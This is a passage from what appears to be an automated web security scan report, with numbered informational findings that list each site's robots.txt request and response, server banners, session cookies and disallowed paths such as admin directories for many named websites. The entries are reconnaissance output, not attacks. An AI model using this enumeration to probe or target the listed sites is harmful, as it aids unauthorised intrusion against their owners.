Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.764. http://www.heartofateachermovie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heartofateachermovie.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heartofateachermovie.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:40:31 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Mar 2011 16:30:42 GMT
ETag: "1888439-63f-49d6e5140b080"
Accept-Ranges: bytes
Content-Length: 1599
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.765. http://www.hearya.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hearya.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hearya.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:35:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 04 May 2011 03:35:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=9ae95cfa844f92377526de1f6765d2c3; path=/
X-Pingback: http://www.hearya.com/xmlrpc.php
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.766. http://www.heavyequipmentshop.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heavyequipmentshop.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heavyequipmentshop.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:08:01 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 08 Jul 2008 14:25:13 GMT
ETag: "6350c3a-91-45183f5c90440"
Accept-Ranges: bytes
Content-Length: 145
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /view.php
# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://www.heavyequipmentshop.info/sitemap.xml.gz
# END XML-SITEMAP-PLUGIN

27.767. http://www.heels.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heels.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heels.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_throttle/3.1.2 PHP/5.2.10 FrontPage/5.0.2.2623 mod_ssl/2.8.31 OpenSSL/0.9.7a
Vary: *
Cache-Control: max-age=300
Expires: Wed, 04 May 2011 01:26:46 GMT
Last-Modified: Fri, 24 Apr 2009 06:25:33 GMT
ETag: "7a43b7-19-49f15b5d"
Accept-Ranges: bytes
Content-Length: 25
Content-Type: text/plain
Date: Wed, 04 May 2011 01:21:46 GMT
Connection: close

User-agent: *
Disallow:

27.768. http://www.heise.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heise.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heise.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:01 GMT
Server: Apache
Last-Modified: Tue, 19 Apr 2011 11:52:57 GMT
Accept-Ranges: bytes
Content-Length: 5964
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=utf-8

# $Revision: 15483 $
User-agent: MS Search 4.0 Robot
Disallow: /

User-agent: Nutch
Disallow: /

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
# Misc.
Disallow: /10jahre/
Disallow: /bin/

...[SNIP]...

27.769. http://www.hemmy.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hemmy.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hemmy.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:42 GMT
Server: Apache/1.3.41 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
X-Pingback: http://www.hemmy.net/xmlrpc.php
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.770. http://www.henriettesherbal.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.henriettesherbal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.henriettesherbal.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:11 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 16:18:43 GMT
ETag: "49b440c-110c-490c761f23ec0"
Accept-Ranges: bytes
Content-Length: 4364
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:43:11 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /inc
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /sites/
Disallow: /themes/
# Files
Disa
...[SNIP]...

27.771. http://www.henryfields.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.henryfields.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.henryfields.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Wed, 04 May 2011 02:51:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 8040
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCRQCDTC=HHIBAJNDDAMCKKCIFFBECLDK; path=/
Cache-control: private

# ROBOTS.TXT: 03/05/2008

# keep "dangerous" bots out of everything
# keep all bots out of the listed files and folders

User-agent: Gigabot
Disallow: /

User-agent: TurnitinBot
Disallow: /
...[SNIP]...

27.772. http://www.heraldstandard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heraldstandard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heraldstandard.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2034736
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 03:19:15 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.022
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: heraldstandard.com
X-TNCMS-Served-By: cmsapp3
Content-Length: 1683

User-agent: MSNBot
Crawl-delay: 3
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /search/?
Disallow: /*?mode=print
Disallow: /*?print
Disallow: /*?mode=story
Disallow:
...[SNIP]...

27.773. http://www.herbalremediesinfo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herbalremediesinfo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herbalremediesinfo.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:21 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.herbalremediesinfo.com/jLBOvb9w.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /d
...[SNIP]...

27.774. http://www.herbergers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herbergers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herbergers.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.0.2.37 Apache/2.0.47 (Unix)
Last-Modified: Tue, 18 Jan 2011 20:58:20 GMT
ETag: "3030c-3e-290c9300"
ntCoent-Length: 62
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 01:49:28 GMT
Date: Wed, 04 May 2011 00:49:28 GMT
Content-Length: 62
Connection: close

User-agent: *
Allow: /y_key_dec279e7ab40a286.html
Disallow: /

27.775. http://www.heredomination.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.heredomination.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.heredomination.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Wed, 04 May 2011 01:44:02 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 20 Nov 2009 12:36:34 GMT
ETag: "8a80c1-54-4b068d52"
Accept-Ranges: bytes
Content-Length: 84

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.heredomination.com/sitemap.xml

27.776. http://www.herenextdoor.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herenextdoor.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herenextdoor.tv

Response

HTTP/1.1 200 OK
Server: nginx/0.8.20
Date: Wed, 04 May 2011 01:52:52 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 28 Nov 2008 04:05:26 GMT
ETag: "1248020-51-492f6e06"
Accept-Ranges: bytes
Content-Length: 81

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.herenextdoor.tv/sitemap.xml

27.777. http://www.hereteens.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hereteens.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hereteens.tv

Response

HTTP/1.1 200 OK
Server: nginx/0.8.1
Date: Wed, 04 May 2011 00:39:41 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 19 Jul 2010 13:22:37 GMT
ETag: "d391b9-4e-4c44519d"
Accept-Ranges: bytes
Content-Length: 78

User-agent: *
Disallow: /gal.cgi
Sitemap: http://www.hereteens.tv/sitemap.xml

27.778. http://www.herkimercountyfair.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herkimercountyfair.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herkimercountyfair.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:06 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 08 Aug 2006 03:51:34 GMT
ETag: "95f0050-130-41a7982c29d80"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.779. http://www.herzingonline.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.herzingonline.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.herzingonline.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:44:09 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 08 Jul 2010 21:46:10 GMT
ETag: "115c1d5-449-36e68c80"
Accept-Ranges: bytes
Content-Length: 1097
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:44:09 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /sites/
Disallow: /themes/
Disallow:
...[SNIP]...

27.780. http://www.hifisoundconnection.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hifisoundconnection.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hifisoundconnection.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:23:11 GMT
Server: Apache
Last-Modified: Wed, 23 Feb 2011 14:51:24 GMT
Accept-Ranges: bytes
Content-Length: 1115
Cache-Control: max-age=1
Expires: Wed, 04 May 2011 01:23:12 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *

Disallow: /*sort=*
Disallow: /*sort_*
Disallow: /*printable=Y
Disallow: /*js=*
Disallow: *?sortBy=
Disallow: *?spcat=
Disallow: /accounts
Disallow: /account
Disallow: /admin/
Disallow:
...[SNIP]...

27.781. http://www.hihostels.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hihostels.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hihostels.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:17 GMT
Server: Apache
Last-Modified: Fri, 28 May 2010 11:17:29 GMT
ETag: "7b-487a5a70f6440"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /main/
Disallow: /affiliates/

Sitemap: http://www.hihostels.com/sitemap.xml



27.782. http://www.hikariusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hikariusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hikariusa.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:22:10 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 23:05:15 GMT
ETag: "12b807f-241-4d51cc2b"
Accept-Ranges: bytes
Content-Length: 577
Connection: close
Content-Type: text/plain; charset=UTF-8

# Tuesday, October 19, 2010 4:13:48 PM

User-agent: Googlebot

Disallow: /wp-*
Disallow: /wp-content/
Disallow: /trackback/
Disallow: /wp-admin/
Disallow: /feed/
Disallow: /archives/
Disallow: /sitema
...[SNIP]...

27.783. http://www.hipandpop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hipandpop.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hipandpop.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:03 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
X-Pingback: http://www.hipandpop.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.hipandpop.com/sitemap.xml.gz

27.784. http://www.hipmunk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hipmunk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hipmunk.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/plain
Last-Modified: Thu, 23 Sep 2010 17:52:39 GMT
Content-Length: 23
Date: Wed, 04 May 2011 02:06:02 GMT
X-Varnish: 1520893208 1498335246
Age: 2853388
Via: 1.1 varnish
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000

User-Agent: *
Allow: /

27.785. http://www.hispanic-culture-online.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hispanic-culture-online.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hispanic-culture-online.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:13 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.hispanic-culture-online.com/Us6f6xHm.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallo
...[SNIP]...

27.786. http://www.hitlake.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hitlake.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hitlake.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 04 May 2011 04:14:27 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Sat, 03 Jul 2010 23:27:45 GMT
ETag: "40e7dd-17-48a840cfbfe40"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding

User-agent: *
Allow: /

27.787. http://www.hlj.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hlj.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hlj.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:36:05 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 296
Last-Modified: Mon, 23 Jun 2008 02:18:16 GMT
Accept-Ranges: bytes
Expires: Wed, 04 May 2011 04:36:05 GMT
Cache-Control: max-age=3600
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: HLJUserId=22X/QU3AyaUg9R7mEFGkAg==; expires=Thu, 03-May-12 03:36:05 GMT; domain=hlj.com; path=/

User-agent: ia_archiver
Crawl-delay: 60
Allow: /

User-agent: Slurp
Crawl-delay: 60
Allow: /

User-agent: Googlebot
Crawl-delay: 10
Allow: /

User-agent: msnbot
Crawl-delay: 10
Allow: /

User-agent: B
...[SNIP]...

27.788. http://www.hobby-hour.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hobby-hour.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hobby-hour.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:37:16 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 07 Oct 2010 16:11:00 GMT
ETag: "4ea00fb-35-4920923cf6d00"
Accept-Ranges: bytes
Content-Length: 53
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /stats/


27.789. http://www.hobbyprojects.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hobbyprojects.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hobbyprojects.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:17:09 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 09:16:33 GMT
ETag: "2a1618f-18-4a16a328de178"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.790. http://www.holabirdsports.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holabirdsports.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.holabirdsports.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 23:26:02 GMT
Server: Apache
Last-Modified: Mon, 29 Jun 2009 07:15:26 GMT
ETag: "19003c-148e-74441f80"
Accept-Ranges: bytes
Content-Length: 5262
Content-Type: text/plain; charset=ISO-8859-1
Set-Cookie: sessionid=173.193.214.243.1304465162195171; path=/
Vary: Accept-Encoding
Connection: close

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: FreeFind
Disallow: /

User-agent: BecomeBot
Disallow: /

User-agent: Nutch
Disallow: /

User-agent: Jetbot/1.0
Disallow: /

User-agent: Jetbot
Dis
...[SNIP]...

27.791. http://www.holiday-clipart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holiday-clipart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.holiday-clipart.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:32 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 07 Oct 2010 01:02:49 GMT
ETag: "1c30147-20b-491fc73e4c040"
Accept-Ranges: bytes
Content-Length: 523
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /axs
Disallow: /_ast
Disallow: /cgi-bin
Disallow: /_java
Disallow: /_private
Disallow: /_sitemap_gen
Disallow: /_iclip_pics
Disallow: /_inc
Disallow: /ecards
Disallow: /_ALL_HO
...[SNIP]...

27.792. http://www.hollywoodbowl.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hollywoodbowl.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hollywoodbowl.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:42:32 GMT
Server: Apache/2.2.13 (Win32) JRun/4.0
Last-Modified: Fri, 20 Mar 2009 00:51:29 GMT
ETag: "3000000000439-17-465825133d2b2"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.793. http://www.holmesproducts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holmesproducts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.holmesproducts.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 202
Date: Wed, 04 May 2011 02:08:22 GMT
Content-Type: text/plain
ETag: "9c4722506761cb1:6c56"
Server: Microsoft-IIS/6.0
Last-Modified: Fri, 01 Oct 2010 12:51:06 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET

User-agent: *
Disallow: /App_Themes/
Disallow: /bin/
Disallow: /Controls/
Disallow: /HolmesLighting/
Disallow: /Images/
Disallow: /Media/
Disallow: /Scripts/
Disallow: /Styles/
Disallow: /swf
...[SNIP]...

27.794. http://www.holtorfmed.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.holtorfmed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.holtorfmed.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:13:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 16 Jun 2010 19:59:28 GMT
ETag: "23f8005-92-4892b28cd8800"
Accept-Ranges: bytes
Content-Length: 146
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin
Disallow: /class
Disallow: /script
Disallow: /include/
Disallow: /templates_c
Disallow: /themes
Disallow: /uploads

27.795. http://www.home-improvement-and-financing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.home-improvement-and-financing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.home-improvement-and-financing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:05:50 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.home-improvement-and-financing.com/n2zFj5Hc.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/

...[SNIP]...

27.796. http://www.homeadditionplus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeadditionplus.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homeadditionplus.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:13 GMT
Server: Apache
Last-Modified: Wed, 10 Jun 2009 09:56:18 GMT
ETag: "62b0146-2a-46bfb7c95d480"
Accept-Ranges: bytes
Content-Length: 42
Connection: close
Content-Type: text/plain

#Robots.txt file
User-agent: *
Disallow:

27.797. http://www.homeawayrealestate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homeawayrealestate.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homeawayrealestate.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "/+8RL+iBTva"
Last-Modified: Tue, 31 Aug 2010 15:52:12 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 90
Date: Wed, 04 May 2011 03:36:08 GMT
Set-Cookie: NSC_IBSF_Qfstjtufodf_Hspvq=ffffffffaf141dd945525d5f4f58455e445a4a4229a0;path=/;httponly

User-agent: *

Disallow: /dn/

Sitemap: http://www.homeawayrealestate.com/sitemap.xml

27.798. http://www.homedepotmoving.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homedepotmoving.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homedepotmoving.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 05 Apr 2011 18:17:14 GMT
Accept-Ranges: bytes
ETag: "5ab76b0bdf3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:13:06 GMT
Connection: close
Content-Length: 151

User-agent: *
Disallow: /aspnet_client/
Disallow: /bin/
Disallow: /WebResource.axd
Disallow: /ScriptResource.axd
Disallow: /?&*
Disallow: /*.axd?

27.799. http://www.homefurnitureshowroom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homefurnitureshowroom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homefurnitureshowroom.com

Response

HTTP/1.0 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 2767
Date: Wed, 04 May 2011 02:50:33 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=fu33yx45kpbrqkvlfqi41rym; path=/; HttpOnly


User-agent: msnbot

Crawl-delay: 1

User-Agent: *
Sitemap: http://www.homefurnitureshowroom.com/sitemap-hfs.xml
Disallow: /images/
Disallow: /admin/*
Disallow: /projectmgr/*
Disallow: /fav
...[SNIP]...

27.800. http://www.homegauge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homegauge.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homegauge.com

Response

HTTP/1.0 200 OK
Server: Resin/3.0.26
P3P: CP="DSP ALL CUR OUR PUBi BUS NAV COM STA INT PHY DEM UNI ONL"
ETag: "6gqVtjHV/1k"
Last-Modified: Tue, 20 Jan 2009 14:49:00 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 107
Date: Wed, 04 May 2011 03:25:56 GMT

User-agent: *
Disallow: /report/
Disallow: /calendar/
Disallow: /calembed.html
Disallow: /calendar.html

27.801. http://www.homelifeweekly.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homelifeweekly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homelifeweekly.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:32:59 GMT
Server: Apache
X-Pingback: http://www.homelifeweekly.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.homelifeweekly.com/sitemap.xml.gz

27.802. http://www.homelite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homelite.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homelite.com

Response

